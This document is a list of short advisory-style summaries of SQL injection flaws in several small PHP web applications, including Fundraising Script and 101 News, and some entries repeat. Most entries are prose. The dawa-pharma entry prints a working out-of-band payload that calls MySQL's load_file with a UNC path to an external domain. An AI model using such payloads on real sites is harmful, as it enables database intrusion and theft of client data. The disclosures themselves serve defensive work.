The 'id' parameter of Computer Laboratory Management System v1.0 is prone to SQL injection attacks. By injecting a payload that includes a sub-query to MySQL's load_file function with a UNC file path pointing to an external domain, an attacker can execute malicious SQL queries and retrieve sensitive information from the system.
The 'nid' parameter in Best Student Result Management System v1.0 is prone to SQL injection attacks. An attacker can exploit this vulnerability to execute arbitrary SQL queries on the underlying database. By injecting a malicious payload that calls MySQL's load_file function with a UNC file path pointing to an external domain, the attacker can interact with the external domain and extract sensitive information from the system.
The 'cityedit' parameter in the Human Resource Management System v1.0 is vulnerable to SQL injection attacks. An attacker can inject a payload that calls MySQL's load_file function with a UNC file path referencing a URL on an external domain. By executing this injected SQL query, the attacker can gain access to all information stored in the system.
The 'cid' parameter in Fundraising Script-1.0 is vulnerable to SQL injection attacks. By injecting a payload like 'mysql' into the 'cid' parameter, an attacker can potentially manipulate the database and access sensitive information. This could lead to unauthorized access to donor information and bank accounts.
The 'searchtitle' parameter in 101 News-1.0 is vulnerable to SQL injection attacks. By injecting a SQL sub-query payload that calls MySQL's load_file function with a UNC file path referencing an external domain, an attacker can execute malicious SQL queries. The application interacts with the external domain, confirming the successful execution of the injected SQL query.
The 'id' parameter in PHP Shopping Cart-4.2 is vulnerable to SQL injection attacks. By manipulating the 'id' parameter, an attacker can easily retrieve sensitive information from the database of the web application.
The Equipment Rental Script-1.0 is vulnerable to SQL injection in the package_id parameter. By injecting a payload such as 'mysql', an attacker can manipulate the database and potentially retrieve sensitive information. An error message was triggered when the payload was injected, indicating the presence of a SQL injection vulnerability.
The 'email' parameter in dawa-pharma-1.0-2022 is vulnerable to SQL injection attacks. By injecting a malicious payload like '+(select load_file('\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\lhc'))+', an attacker can execute a sub-query that calls MySQL's load_file function with a UNC file path pointing to an external domain. This allows the attacker to retrieve clients' sensitive information and access server data.
The 'cid' parameter in Fundraising Script-1.0 is vulnerable to SQL injection attacks. Submitting a single quote (') as the cid parameter returned a database error message. If the database is not empty, this vulnerability could lead to unauthorized access to sensitive information such as donors' money and bank account details.
The searchtitle parameter in 101 News-1.0 is vulnerable to SQL injection attacks. By submitting a specific payload in the searchtitle parameter, an attacker can inject a SQL sub-query that calls MySQL's load_file function with a UNC file path pointing to an external domain. This allows the attacker to interact with the external domain, confirming the successful execution of the injected SQL query.